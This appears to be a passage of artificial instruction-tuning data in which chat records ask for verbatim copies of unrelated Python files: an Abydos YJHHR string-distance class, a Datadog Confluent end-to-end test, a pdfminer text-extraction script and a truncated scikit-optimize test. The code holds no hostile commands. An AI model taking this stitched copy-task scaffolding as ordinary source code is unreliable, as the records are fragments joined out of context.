description in\n :py:class:`_TokenDistance` for details.\n **kwargs\n Arbitrary keyword arguments\n\n Other Parameters\n ----------------\n qval : int\n The length of each q-gram. Using this parameter and tokenizer=None\n will cause the instance to use the QGram tokenizer with this\n q value.\n metric : _Distance\n A string distance measure class for use in the ``soft`` and\n ``fuzzy`` variants.\n threshold : float\n A threshold value, similarities above which are counted as\n members of the intersection for the ``fuzzy`` variant.\n\n\n .. versionadded:: 0.4.0\n\n \"\"\"\n super(YJHHR, self).__init__(\n alphabet=alphabet,\n tokenizer=tokenizer,\n intersection_type=intersection_type,\n **kwargs\n )\n self.set_params(pval=pval)\n\n def dist_abs(self, src: str, tar: str) -> float:\n \"\"\"Return the YJHHR distance of two strings.\n\n Parameters\n ----------\n src : str\n Source string (or QGrams/Counter objects) for comparison\n tar : str\n Target string (or QGrams/Counter objects) for comparison\n\n Returns\n -------\n float\n YJHHR distance\n\n Examples\n --------\n >>> cmp = YJHHR()\n >>> cmp.dist_abs('cat', 'hat')\n 4.0\n >>> cmp.dist_abs('Niall', 'Neil')\n 7.0\n >>> cmp.dist_abs('aluminum', 'Catalan')\n 15.0\n >>> cmp.dist_abs('ATCG', 'TAGC')\n 10.0\n\n\n .. versionadded:: 0.4.0\n\n \"\"\"\n if src == tar:\n return 0.0\n\n self._tokenize(src, tar)\n\n b = self._src_only_card() ** self.params['pval']\n c = self._tar_only_card() ** self.params['pval']\n\n return float(round((b + c) ** (1 / self.params['pval']), 14))\n\n def dist(self, src: str, tar: str) -> float:\n \"\"\"Return the normalized YJHHR distance of two strings.\n\n Parameters\n ----------\n src : str\n Source string (or QGrams/Counter objects) for comparison\n tar : str\n Target string (or QGrams/Counter objects) for comparison\n\n Returns\n -------\n float\n normalized YJHHR distance\n\n Examples\n --------\n >>> cmp = YJHHR()\n >>> cmp.dist('cat', 'hat')\n 0.6666666666666666\n >>> cmp.dist('Niall', 'Neil')\n 0.7777777777777778\n >>> cmp.dist('aluminum', 'Catalan')\n 0.9375\n >>> cmp.dist('ATCG', 'TAGC')\n 1.0\n\n\n .. versionadded:: 0.4.0\n\n \"\"\"\n distance = self.dist_abs(src, tar)\n union = self._union_card()\n if union == 0:\n return 0.0\n return distance / union\n\n\nif __name__ == '__main__':\n import doctest\n\n doctest.testmod()\n```<|memory_end|>\nOutput a verbatim copy.",
"role": "user"
}
] |
```python
# Copyright 2019-2020 by Christopher C. Little.
# This file is part of Abydos.
#
# Abydos is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Abydos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Abydos. If not, see <http://www.gnu.org/licenses/>.
"""abydos.distance._yjhhr.
YJHHR distance
"""
from typing import Any, Counter as TCounter, Optional, Sequence, Set, Union
from ._token_distance import _TokenDistance
from ..tokenizer import _Tokenizer
__all__ = ['YJHHR']
class YJHHR(_TokenDistance):
r"""YJHHR distance.
For two sets X and Y and a parameter p, YJHHR distance
:cite:`Yang:2016` is
.. math::
dist_{YJHHR_p}(X, Y) =
\sqrt[p]{|X \setminus Y|^p + |Y \setminus X|^p}
In :ref:`2x2 confusion table terms <confusion_table>`, where a+b+c+d=n,
this is
.. math::
dist_{YJHHR} =
\sqrt[p]{b^p + c^p}
.. versionadded:: 0.4.0
"""
def __init__(
self,
pval: int = 1,
alphabet: Optional[
Union[TCounter[str], Sequence[str], Set[str], int]
] = None,
tokenizer: Optional[_Tokenizer] = None,
intersection_type: str = 'crisp',
**kwargs: Any
) -> None:
"""Initialize YJHHR instance.
Parameters
----------
pval : int
The :math:`p`-value of the :math:`L^p`-space
alphabet : Counter, collection, int, or None
This represents the alphabet of possible tokens.
See :ref:`alphabet <alphabet>` description in
:py:class:`_TokenDistance` for details.
tokenizer : _Tokenizer
A tokenizer instance from the :py:mod:`abydos.tokenizer` package
intersection_type : str
Specifies the intersection type, and set type as a result:
See :ref:`intersection_type <intersection_type>` description in
:py:class:`_TokenDistance` for details.
**kwargs
Arbitrary keyword arguments
Other Parameters
----------------
qval : int
The length of each q-gram. Using this parameter and tokenizer=None
will cause the instance to use the QGram tokenizer with this
q value.
metric : _Distance
A string distance measure class for use in the ``soft`` and
``fuzzy`` variants.
threshold : float
A threshold value, similarities above which are counted as
members of the intersection for the ``fuzzy`` variant.
.. versionadded:: 0.4.0
"""
super(YJHHR, self).__init__(
alphabet=alphabet,
tokenizer=tokenizer,
intersection_type=intersection_type,
**kwargs
)
self.set_params(pval=pval)
def dist_abs(self, src: str, tar: str) -> float:
"""Return the YJHHR distance of two strings.
Parameters
----------
src : str
Source string (or QGrams/Counter objects) for comparison
tar : str
Target string (or QGrams/Counter objects) for comparison
Returns
-------
float
YJHHR distance
Examples
--------
>>> cmp = YJHHR()
>>> cmp.dist_abs('cat', 'hat')
4.0
>>> cmp.dist_abs('Niall', 'Neil')
7.0
>>> cmp.dist_abs('aluminum', 'Catalan')
15.0
>>> cmp.dist_abs('ATCG', 'TAGC')
10.0
.. versionadded:: 0.4.0
"""
if src == tar:
return 0.0
self._tokenize(src, tar)
b = self._src_only_card() ** self.params['pval']
c = self._tar_only_card() ** self.params['pval']
return float(round((b + c) ** (1 / self.params['pval']), 14))
def dist(self, src: str, tar: str) -> float:
"""Return the normalized YJHHR distance of two strings.
Parameters
----------
src : str
Source string (or QGrams/Counter objects) for comparison
tar : str
Target string (or QGrams/Counter objects) for comparison
Returns
-------
float
normalized YJHHR distance
Examples
--------
>>> cmp = YJHHR()
>>> cmp.dist('cat', 'hat')
0.6666666666666666
>>> cmp.dist('Niall', 'Neil')
0.7777777777777778
>>> cmp.dist('aluminum', 'Catalan')
0.9375
>>> cmp.dist('ATCG', 'TAGC')
1.0
.. versionadded:: 0.4.0
"""
distance = self.dist_abs(src, tar)
union = self._union_card()
if union == 0:
return 0.0
return distance / union
if __name__ == '__main__':
import doctest
doctest.testmod()
```
|
[
{
"content": "Repeat the following code:\n```python\n# (C) Datadog, Inc. 2020-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\nfrom typing import Any\n\nimport pytest\n\nfrom datadog_checks.base.stubs.aggregator import AggregatorStub\n\nfrom .common import CHECK_CONFIG\nfrom .metrics import ALWAYS_PRESENT_METRICS, NOT_ALWAYS_PRESENT_METRICS\n\n# TODO: missing e2e coverage for following metrics. See metrics in metrics.yaml.\n# - Kafka Connect Task Metrics\n# - Kafka Connect Sink Metrics\n# - Kafka Connect Source Tasks Metrics\n# - Kafka Connect Task Error Metrics\n# - Confluent Streams Thread\n# - Confluent Streams Thread Task\n# - Confluent Stream Processor Node Metrics\n\n\[email protected]\ndef test_e2e(dd_agent_check):\n # type: (Any) -> None\n aggregator = dd_agent_check(CHECK_CONFIG, rate=True) # type: AggregatorStub\n\n # Skip default `jvm.*` metrics by marking them as asserted\n for metric_name in aggregator._metrics:\n if metric_name.startswith('jvm.'):\n aggregator.assert_metric(metric_name)\n\n for metric in ALWAYS_PRESENT_METRICS:\n aggregator.assert_metric(metric)\n\n for metric in NOT_ALWAYS_PRESENT_METRICS:\n aggregator.assert_metric(metric, at_least=0)\n\n aggregator.assert_all_metrics_covered()\n\n for instance in CHECK_CONFIG['instances']:\n tags = ['instance:confluent_platform-localhost-{}'.format(instance['port']), 'jmx_server:localhost']\n # TODO: Assert the status \"status=AgentCheck.OK\"\n # JMXFetch is currently sending the service check status as string, but should be number.\n # Add \"status=AgentCheck.OK\" once that's fixed\n # See https://github.com/DataDog/jmxfetch/pull/287\n aggregator.assert_service_check('confluent.can_connect', tags=tags)\n```",
"role": "user"
}
] |
[
{
"content": "Repeat the following code:\n<|memory_start|>```python\n# (C) Datadog, Inc. 2020-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\nfrom typing import Any\n\nimport pytest\n\nfrom datadog_checks.base.stubs.aggregator import AggregatorStub\n\nfrom .common import CHECK_CONFIG\nfrom .metrics import ALWAYS_PRESENT_METRICS, NOT_ALWAYS_PRESENT_METRICS\n\n# TODO: missing e2e coverage for following metrics. See metrics in metrics.yaml.\n# - Kafka Connect Task Metrics\n# - Kafka Connect Sink Metrics\n# - Kafka Connect Source Tasks Metrics\n# - Kafka Connect Task Error Metrics\n# - Confluent Streams Thread\n# - Confluent Streams Thread Task\n# - Confluent Stream Processor Node Metrics\n\n\[email protected]\ndef test_e2e(dd_agent_check):\n # type: (Any) -> None\n aggregator = dd_agent_check(CHECK_CONFIG, rate=True) # type: AggregatorStub\n\n # Skip default `jvm.*` metrics by marking them as asserted\n for metric_name in aggregator._metrics:\n if metric_name.startswith('jvm.'):\n aggregator.assert_metric(metric_name)\n\n for metric in ALWAYS_PRESENT_METRICS:\n aggregator.assert_metric(metric)\n\n for metric in NOT_ALWAYS_PRESENT_METRICS:\n aggregator.assert_metric(metric, at_least=0)\n\n aggregator.assert_all_metrics_covered()\n\n for instance in CHECK_CONFIG['instances']:\n tags = ['instance:confluent_platform-localhost-{}'.format(instance['port']), 'jmx_server:localhost']\n # TODO: Assert the status \"status=AgentCheck.OK\"\n # JMXFetch is currently sending the service check status as string, but should be number.\n # Add \"status=AgentCheck.OK\" once that's fixed\n # See https://github.com/DataDog/jmxfetch/pull/287\n aggregator.assert_service_check('confluent.can_connect', tags=tags)\n```<|memory_end|>",
"role": "user"
}
] |
```python
# (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from typing import Any
import pytest
from datadog_checks.base.stubs.aggregator import AggregatorStub
from .common import CHECK_CONFIG
from .metrics import ALWAYS_PRESENT_METRICS, NOT_ALWAYS_PRESENT_METRICS
# TODO: missing e2e coverage for following metrics. See metrics in metrics.yaml.
# - Kafka Connect Task Metrics
# - Kafka Connect Sink Metrics
# - Kafka Connect Source Tasks Metrics
# - Kafka Connect Task Error Metrics
# - Confluent Streams Thread
# - Confluent Streams Thread Task
# - Confluent Stream Processor Node Metrics
@pytest.mark.e2e
def test_e2e(dd_agent_check):
# type: (Any) -> None
aggregator = dd_agent_check(CHECK_CONFIG, rate=True) # type: AggregatorStub
# Skip default `jvm.*` metrics by marking them as asserted
for metric_name in aggregator._metrics:
if metric_name.startswith('jvm.'):
aggregator.assert_metric(metric_name)
for metric in ALWAYS_PRESENT_METRICS:
aggregator.assert_metric(metric)
for metric in NOT_ALWAYS_PRESENT_METRICS:
aggregator.assert_metric(metric, at_least=0)
aggregator.assert_all_metrics_covered()
for instance in CHECK_CONFIG['instances']:
tags = ['instance:confluent_platform-localhost-{}'.format(instance['port']), 'jmx_server:localhost']
# TODO: Assert the status "status=AgentCheck.OK"
# JMXFetch is currently sending the service check status as string, but should be number.
# Add "status=AgentCheck.OK" once that's fixed
# See https://github.com/DataDog/jmxfetch/pull/287
aggregator.assert_service_check('confluent.can_connect', tags=tags)
```
|
[
{
"content": "```python\n#!/usr/bin/env python\n\n\"\"\"\nConverts PDF text content (though not images containing text) to plain text, html, xml or \"tags\".\n\"\"\"\nimport sys\nimport logging\nimport six\nimport pdfminer.settings\npdfminer.settings.STRICT = False\nimport pdfminer.high_level\nimport pdfminer.layout\nfrom pdfminer.image import ImageWriter\n\n\ndef extract_text(files=[], outfile='-',\n _py2_no_more_posargs=None, # Bloody Python2 needs a shim\n no_laparams=False, all_texts=None, detect_vertical=None, # LAParams\n word_margin=None, char_margin=None, line_margin=None, boxes_flow=None, # LAParams\n output_type='text', codec='utf-8', strip_control=False,\n maxpages=0, page_numbers=None, password=\"\", scale=1.0, rotation=0,\n layoutmode='normal', output_dir=None, debug=False,\n disable_caching=False, **other):\n if _py2_no_more_posargs is not None:\n raise ValueError(\"Too many positional arguments passed.\")\n if not files:\n raise ValueError(\"Must provide files to work upon!\")\n\n # If any LAParams group arguments were passed, create an LAParams object and\n # populate with given args. Otherwise, set it to None.\n if not no_laparams:\n laparams = pdfminer.layout.LAParams()\n for param in (\"all_texts\", \"detect_vertical\", \"word_margin\", \"char_margin\", \"line_margin\", \"boxes_flow\"):\n paramv = locals().get(param, None)\n if paramv is not None:\n setattr(laparams, param, paramv)\n else:\n laparams = None\n\n imagewriter = None\n if output_dir:\n imagewriter = ImageWriter(output_dir)\n\n if output_type == \"text\" and outfile != \"-\":\n for override, alttype in ( (\".htm\", \"html\"),\n (\".html\", \"html\"),\n (\".xml\", \"xml\"),\n (\".tag\", \"tag\") ):\n if outfile.endswith(override):\n output_type = alttype\n\n if outfile == \"-\":\n outfp = sys.stdout\n if outfp.encoding is not None:\n codec = 'utf-8'\n else:\n outfp = open(outfile, \"wb\")\n\n\n for fname in files:\n with open(fname, \"rb\") as fp:\n pdfminer.high_level.extract_text_to_fp(fp, **locals())\n return outfp\n\n# main\ndef main(args=None):\n import argparse\n P = argparse.ArgumentParser(description=__doc__)\n P.add_argument(\"files\", type=str, default=None, nargs=\"+\", help=\"Files to process.\")\n P.add_argument(\"-d\", \"--debug\", default=False, action=\"store_true\", help=\"Debug output.\")\n P.add_argument(\"-p\", \"--pagenos\", type=str, help=\"Comma-separated list of page numbers to parse. Included for legacy applications, use -P/--page-numbers for more idiomatic argument entry.\")\n P.add_argument(\"--page-numbers\", type=int, default=None, nargs=\"+\", help=\"Alternative to --pagenos with space-separated numbers; supercedes --pagenos where it is used.\")\n P.add_argument(\"-m\", \"--maxpages\", type=int, default=0, help = \"Maximum pages to parse\")\n P.add_argument(\"-P\", \"--password\", type=str, default=\"\", help = \"Decryption password for PDF\")\n P.add_argument(\"-o\", \"--outfile\", type=str, default=\"-\", help=\"Output file (default/'-' is stdout)\")\n P.add_argument(\"-t\", \"--output_type\", type=str, default=\"text\", help = \"Output type: text|html|xml|tag (default is text)\")\n P.add_argument(\"-c\", \"--codec\", type=str, default=\"utf-8\", help = \"Text encoding\")\n P.add_argument(\"-s\", \"--scale\", type=float, default=1.0, help = \"Scale\")\n P.add_argument(\"-A\", \"--all-texts\", default=None, action=\"store_true\", help=\"LAParams all texts\")\n P.add_argument(\"-V\", \"--detect-vertical\", default=None, action=\"store_true\", help=\"LAParams detect vertical\")\n P.add_argument(\"-W\", \"--word-margin\", type=float, default=None, help = \"LAParams word margin\")\n P.add_argument(\"-M\", \"--char-margin\", type=float, default=None, help = \"LAParams char margin\")\n P.add_argument(\"-L\", \"--line-margin\", type=float, default=None, help = \"LAParams line margin\")\n P.add_argument(\"-F\", \"--boxes-flow\", type=float, default=None, help = \"LAParams boxes flow\")\n P.add_argument(\"-Y\", \"--layoutmode\", default=\"normal\", type=str, help=\"HTML Layout Mode\")\n P.add_argument(\"-n\", \"--no-laparams\", default=False, action=\"store_true\", help = \"Pass None as LAParams\")\n P.add_argument(\"-R\", \"--rotation\", default=0, type=int, help = \"Rotation\")\n P.add_argument(\"-O\", \"--output-dir\", default=None, help=\"Output directory for images\")\n P.add_argument(\"-C\", \"--disable-caching\", default=False, action=\"store_true\", help=\"Disable caching\")\n P.add_argument(\"-S\", \"--strip-control\", default=False, action=\"store_true\", help=\"Strip control in XML mode\")\n A = P.parse_args(args=args)\n\n if A.page_numbers:\n A.page_numbers = set([x-1 for x in A.page_numbers])\n if A.pagenos:\n A.page_numbers = set([int(x)-1 for x in A.pagenos.split(\",\")])\n\n imagewriter = None\n if A.output_dir:\n imagewriter = ImageWriter(A.output_dir)\n\n if six.PY2 and sys.stdin.encoding:\n A.password = A.password.decode(sys.stdin.encoding)\n\n if A.output_type == \"text\" and A.outfile != \"-\":\n for override, alttype in ( (\".htm\", \"html\"),\n (\".html\", \"html\"),\n (\".xml\", \"xml\" ),\n (\".tag\", \"tag\" ) ):\n if A.outfile.endswith(override):\n A.output_type = alttype\n\n if A.outfile == \"-\":\n outfp = sys.stdout\n if outfp.encoding is not None:\n # Why ignore outfp.encoding? :-/ stupid cathal?\n A.codec = 'utf-8'\n else:\n outfp = open(A.outfile, \"wb\")\n\n ## Test Code\n outfp = extract_text(**vars(A))\n outfp.close()\n return 0\n\n\nif __name__ == '__main__': sys.exit(main())\n```\nRepeat the code exactly as written.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\n#!/usr/bin/env python\n\n\"\"\"\nConverts PDF text content (though not images containing text) to plain text, html, xml or \"tags\".\n\"\"\"\nimport sys\nimport logging\nimport six\nimport pdfminer.settings\npdfminer.settings.STRICT = False\nimport pdfminer.high_level\nimport pdfminer.layout\nfrom pdfminer.image import ImageWriter\n\n\ndef extract_text(files=[], outfile='-',\n _py2_no_more_posargs=None, # Bloody Python2 needs a shim\n no_laparams=False, all_texts=None, detect_vertical=None, # LAParams\n word_margin=None, char_margin=None, line_margin=None, boxes_flow=None, # LAParams\n output_type='text', codec='utf-8', strip_control=False,\n maxpages=0, page_numbers=None, password=\"\", scale=1.0, rotation=0,\n layoutmode='normal', output_dir=None, debug=False,\n disable_caching=False, **other):\n if _py2_no_more_posargs is not None:\n raise ValueError(\"Too many positional arguments passed.\")\n if not files:\n raise ValueError(\"Must provide files to work upon!\")\n\n # If any LAParams group arguments were passed, create an LAParams object and\n # populate with given args. Otherwise, set it to None.\n if not no_laparams:\n laparams = pdfminer.layout.LAParams()\n for param in (\"all_texts\", \"detect_vertical\", \"word_margin\", \"char_margin\", \"line_margin\", \"boxes_flow\"):\n paramv = locals().get(param, None)\n if paramv is not None:\n setattr(laparams, param, paramv)\n else:\n laparams = None\n\n imagewriter = None\n if output_dir:\n imagewriter = ImageWriter(output_dir)\n\n if output_type == \"text\" and outfile != \"-\":\n for override, alttype in ( (\".htm\", \"html\"),\n (\".html\", \"html\"),\n (\".xml\", \"xml\"),\n (\".tag\", \"tag\") ):\n if outfile.endswith(override):\n output_type = alttype\n\n if outfile == \"-\":\n outfp = sys.stdout\n if outfp.encoding is not None:\n codec = 'utf-8'\n else:\n outfp = open(outfile, \"wb\")\n\n\n for fname in files:\n with open(fname, \"rb\") as fp:\n pdfminer.high_level.extract_text_to_fp(fp, **locals())\n return outfp\n\n# main\ndef main(args=None):\n import argparse\n P = argparse.ArgumentParser(description=__doc__)\n P.add_argument(\"files\", type=str, default=None, nargs=\"+\", help=\"Files to process.\")\n P.add_argument(\"-d\", \"--debug\", default=False, action=\"store_true\", help=\"Debug output.\")\n P.add_argument(\"-p\", \"--pagenos\", type=str, help=\"Comma-separated list of page numbers to parse. Included for legacy applications, use -P/--page-numbers for more idiomatic argument entry.\")\n P.add_argument(\"--page-numbers\", type=int, default=None, nargs=\"+\", help=\"Alternative to --pagenos with space-separated numbers; supercedes --pagenos where it is used.\")\n P.add_argument(\"-m\", \"--maxpages\", type=int, default=0, help = \"Maximum pages to parse\")\n P.add_argument(\"-P\", \"--password\", type=str, default=\"\", help = \"Decryption password for PDF\")\n P.add_argument(\"-o\", \"--outfile\", type=str, default=\"-\", help=\"Output file (default/'-' is stdout)\")\n P.add_argument(\"-t\", \"--output_type\", type=str, default=\"text\", help = \"Output type: text|html|xml|tag (default is text)\")\n P.add_argument(\"-c\", \"--codec\", type=str, default=\"utf-8\", help = \"Text encoding\")\n P.add_argument(\"-s\", \"--scale\", type=float, default=1.0, help = \"Scale\")\n P.add_argument(\"-A\", \"--all-texts\", default=None, action=\"store_true\", help=\"LAParams all texts\")\n P.add_argument(\"-V\", \"--detect-vertical\", default=None, action=\"store_true\", help=\"LAParams detect vertical\")\n P.add_argument(\"-W\", \"--word-margin\", type=float, default=None, help = \"LAParams word margin\")\n P.add_argument(\"-M\", \"--char-margin\", type=float, default=None, help = \"LAParams char margin\")\n P.add_argument(\"-L\", \"--line-margin\", type=float, default=None, help = \"LAParams line margin\")\n P.add_argument(\"-F\", \"--boxes-flow\", type=float, default=None, help = \"LAParams boxes flow\")\n P.add_argument(\"-Y\", \"--layoutmode\", default=\"normal\", type=str, help=\"HTML Layout Mode\")\n P.add_argument(\"-n\", \"--no-laparams\", default=False, action=\"store_true\", help = \"Pass None as LAParams\")\n P.add_argument(\"-R\", \"--rotation\", default=0, type=int, help = \"Rotation\")\n P.add_argument(\"-O\", \"--output-dir\", default=None, help=\"Output directory for images\")\n P.add_argument(\"-C\", \"--disable-caching\", default=False, action=\"store_true\", help=\"Disable caching\")\n P.add_argument(\"-S\", \"--strip-control\", default=False, action=\"store_true\", help=\"Strip control in XML mode\")\n A = P.parse_args(args=args)\n\n if A.page_numbers:\n A.page_numbers = set([x-1 for x in A.page_numbers])\n if A.pagenos:\n A.page_numbers = set([int(x)-1 for x in A.pagenos.split(\",\")])\n\n imagewriter = None\n if A.output_dir:\n imagewriter = ImageWriter(A.output_dir)\n\n if six.PY2 and sys.stdin.encoding:\n A.password = A.password.decode(sys.stdin.encoding)\n\n if A.output_type == \"text\" and A.outfile != \"-\":\n for override, alttype in ( (\".htm\", \"html\"),\n (\".html\", \"html\"),\n (\".xml\", \"xml\" ),\n (\".tag\", \"tag\" ) ):\n if A.outfile.endswith(override):\n A.output_type = alttype\n\n if A.outfile == \"-\":\n outfp = sys.stdout\n if outfp.encoding is not None:\n # Why ignore outfp.encoding? :-/ stupid cathal?\n A.codec = 'utf-8'\n else:\n outfp = open(A.outfile, \"wb\")\n\n ## Test Code\n outfp = extract_text(**vars(A))\n outfp.close()\n return 0\n\n\nif __name__ == '__main__': sys.exit(main())\n```<|memory_end|>\nRepeat the code exactly as written.",
"role": "user"
}
] |
```python
#!/usr/bin/env python
"""
Converts PDF text content (though not images containing text) to plain text, html, xml or "tags".
"""
import sys
import logging
import six
import pdfminer.settings
pdfminer.settings.STRICT = False
import pdfminer.high_level
import pdfminer.layout
from pdfminer.image import ImageWriter
def extract_text(files=[], outfile='-',
_py2_no_more_posargs=None, # Bloody Python2 needs a shim
no_laparams=False, all_texts=None, detect_vertical=None, # LAParams
word_margin=None, char_margin=None, line_margin=None, boxes_flow=None, # LAParams
output_type='text', codec='utf-8', strip_control=False,
maxpages=0, page_numbers=None, password="", scale=1.0, rotation=0,
layoutmode='normal', output_dir=None, debug=False,
disable_caching=False, **other):
if _py2_no_more_posargs is not None:
raise ValueError("Too many positional arguments passed.")
if not files:
raise ValueError("Must provide files to work upon!")
# If any LAParams group arguments were passed, create an LAParams object and
# populate with given args. Otherwise, set it to None.
if not no_laparams:
laparams = pdfminer.layout.LAParams()
for param in ("all_texts", "detect_vertical", "word_margin", "char_margin", "line_margin", "boxes_flow"):
paramv = locals().get(param, None)
if paramv is not None:
setattr(laparams, param, paramv)
else:
laparams = None
imagewriter = None
if output_dir:
imagewriter = ImageWriter(output_dir)
if output_type == "text" and outfile != "-":
for override, alttype in ( (".htm", "html"),
(".html", "html"),
(".xml", "xml"),
(".tag", "tag") ):
if outfile.endswith(override):
output_type = alttype
if outfile == "-":
outfp = sys.stdout
if outfp.encoding is not None:
codec = 'utf-8'
else:
outfp = open(outfile, "wb")
for fname in files:
with open(fname, "rb") as fp:
pdfminer.high_level.extract_text_to_fp(fp, **locals())
return outfp
# main
def main(args=None):
import argparse
P = argparse.ArgumentParser(description=__doc__)
P.add_argument("files", type=str, default=None, nargs="+", help="Files to process.")
P.add_argument("-d", "--debug", default=False, action="store_true", help="Debug output.")
P.add_argument("-p", "--pagenos", type=str, help="Comma-separated list of page numbers to parse. Included for legacy applications, use -P/--page-numbers for more idiomatic argument entry.")
P.add_argument("--page-numbers", type=int, default=None, nargs="+", help="Alternative to --pagenos with space-separated numbers; supercedes --pagenos where it is used.")
P.add_argument("-m", "--maxpages", type=int, default=0, help = "Maximum pages to parse")
P.add_argument("-P", "--password", type=str, default="", help = "Decryption password for PDF")
P.add_argument("-o", "--outfile", type=str, default="-", help="Output file (default/'-' is stdout)")
P.add_argument("-t", "--output_type", type=str, default="text", help = "Output type: text|html|xml|tag (default is text)")
P.add_argument("-c", "--codec", type=str, default="utf-8", help = "Text encoding")
P.add_argument("-s", "--scale", type=float, default=1.0, help = "Scale")
P.add_argument("-A", "--all-texts", default=None, action="store_true", help="LAParams all texts")
P.add_argument("-V", "--detect-vertical", default=None, action="store_true", help="LAParams detect vertical")
P.add_argument("-W", "--word-margin", type=float, default=None, help = "LAParams word margin")
P.add_argument("-M", "--char-margin", type=float, default=None, help = "LAParams char margin")
P.add_argument("-L", "--line-margin", type=float, default=None, help = "LAParams line margin")
P.add_argument("-F", "--boxes-flow", type=float, default=None, help = "LAParams boxes flow")
P.add_argument("-Y", "--layoutmode", default="normal", type=str, help="HTML Layout Mode")
P.add_argument("-n", "--no-laparams", default=False, action="store_true", help = "Pass None as LAParams")
P.add_argument("-R", "--rotation", default=0, type=int, help = "Rotation")
P.add_argument("-O", "--output-dir", default=None, help="Output directory for images")
P.add_argument("-C", "--disable-caching", default=False, action="store_true", help="Disable caching")
P.add_argument("-S", "--strip-control", default=False, action="store_true", help="Strip control in XML mode")
A = P.parse_args(args=args)
if A.page_numbers:
A.page_numbers = set([x-1 for x in A.page_numbers])
if A.pagenos:
A.page_numbers = set([int(x)-1 for x in A.pagenos.split(",")])
imagewriter = None
if A.output_dir:
imagewriter = ImageWriter(A.output_dir)
if six.PY2 and sys.stdin.encoding:
A.password = A.password.decode(sys.stdin.encoding)
if A.output_type == "text" and A.outfile != "-":
for override, alttype in ( (".htm", "html"),
(".html", "html"),
(".xml", "xml" ),
(".tag", "tag" ) ):
if A.outfile.endswith(override):
A.output_type = alttype
if A.outfile == "-":
outfp = sys.stdout
if outfp.encoding is not None:
# Why ignore outfp.encoding? :-/ stupid cathal?
A.codec = 'utf-8'
else:
outfp = open(A.outfile, "wb")
## Test Code
outfp = extract_text(**vars(A))
outfp.close()
return 0
if __name__ == '__main__': sys.exit(main())
```
|
[
{
"content": "Here is a code file:\n```python\n\"\"\"This script contains set of functions that test parallel optimization with\nskopt, where constant liar parallelization strategy is used.\n\"\"\"\n\n\nfrom numpy.testing import assert_equal\nfrom numpy.testing import assert_raises\n\nfrom skopt.space import Real\nfrom skopt import Optimizer\nfrom skopt.benchmarks import branin\nimport skopt.learning as sol\n\nfrom scipy.spatial.distance import pdist\nimport pytest\n\n# list of all strategies for parallelization\nsupported_strategies = [\"cl_min\", \"cl_mean\", \"cl_max\"]\n\n# test one acq function that incorporates the runtime, and one that does not\nsupported_acq_functions = [\"EI\", \"EIps\"]\n\n# Extract available surrogates, so that new ones are used automatically\navailable_surrogates = [\n getattr(sol, name) for name in sol.__all__\n if \"GradientBoostingQuantileRegressor\" not in name\n] # excluding the GradientBoostingQuantileRegressor, will open issue later\n\nn_steps = 5 # number of steps to test the algorithms with\nn_points = 4 # number of points to evaluate at a single step\n# n_steps x n_points > n_random_restarts should hold\n\n\[email protected](\"strategy\", supported_strategies)\[email protected](\"surrogate\", available_surrogates)\[email protected](\"acq_func\", supported_acq_functions)\ndef test_constant_liar_runs(strategy, surrogate, acq_func):\n \"\"\"\n Tests whether the optimizer runs properly during the random\n initialization phase and beyond\n\n Parameters\n ----------\n * `strategy` [string]:\n Name of the strategy to use during optimization.\n\n * `surrogate` [scikit-optimize surrogate class]:\n A class of the scikit-optimize surrogate used in Optimizer.\n \"\"\"\n optimizer = Optimizer(\n base_estimator=surrogate(),\n dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],\n acq_func=acq_func,\n acq_optimizer='sampling',\n random_state=0\n )\n\n # test arguments check\n assert_raises(ValueError, optimizer.ask, {\"strategy\": \"cl_maen\"})\n assert_raises(ValueError, optimizer.ask, {\"n_points\": \"0\"})\n assert_raises(ValueError, optimizer.ask, {\"n_points\": 0})\n\n for i in range(n_steps):\n x = optimizer.ask(n_points=n_points, strategy=strategy)\n # check if actually n_points was generated\n assert_equal(len(x), n_points)\n\n if \"ps\" in acq_func:\n optimizer.tell(x, [[branin(v), 1.1] for v in x])\n else:\n optimizer.tell(x, [branin(v) for v in x])\n\n\[email protected](\"strategy\", supported_strategies)\[email protected](\"surrogate\", available_surrogates)\ndef test_all_points_different(strategy, surrogate):\n \"\"\"\n Tests whether the parallel optimizer always generates\n different points to evaluate.\n\n Parameters\n ----------\n * `strategy` [string]:\n Name of the strategy to use during optimization.\n\n * `surrogate` [scikit-optimize surrogate class]:\n A class of the scikit-optimize surrogate used in Optimizer.\n \"\"\"\n optimizer = Optimizer(\n base_estimator=surrogate(),\n dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],\n acq_optimizer='sampling',\n random_state=1\n )\n\n tolerance = 1e-3 # distance above which points are assumed same\n for i in range(n_steps):\n x = optimizer.ask(n_points, strategy)\n optimizer.tell(x, [branin(v) for v in x])\n distances = pdist(x)\n assert all(distances > tolerance)\n\n\[email protected](\"strategy\", supported_strategies)\[email protected](\"surrogate\", available_surrogates)\ndef test_same_set_of_points_ask(strategy, surrogate):\n \"\"\"\n For n_points not None, tests whether two consecutive calls to ask\n return the same sets of points.\n\n Parameters\n ----------\n * `strategy` [string]:\n Name of the strategy to use during optimization.\n\n * `surrogate` [scikit-optimize surrogate class]:\n A class of the scikit-optimize surrogate used in Optimizer.\n \"\"\"\n\n optimizer = Optimizer(\n base_estimator=surrogate(),\n dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],\n acq_optimizer='sampling',\n random_state=2\n )\n\n for i in range(n_steps):\n xa = optimizer.ask(n_points, strategy)\n xb = optimizer.ask(n_points, strategy)\n optimizer.tell(xa, [branin(v) for v in xa])\n assert_equal(xa, xb) # check if the sets of points generated are equal\n\n\[email protected](\"strategy\", supported_strategies)\[email protected](\"surrogate\", available_surrogates)\ndef test_reproducible_runs(strategy, surrogate):\n # two runs of the optimizer should yield exactly the same results\n\n optimizer = Optimizer(\n base_estimator=surrogate(random_state=1),\n dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],\n acq_optimizer='sampling',\n 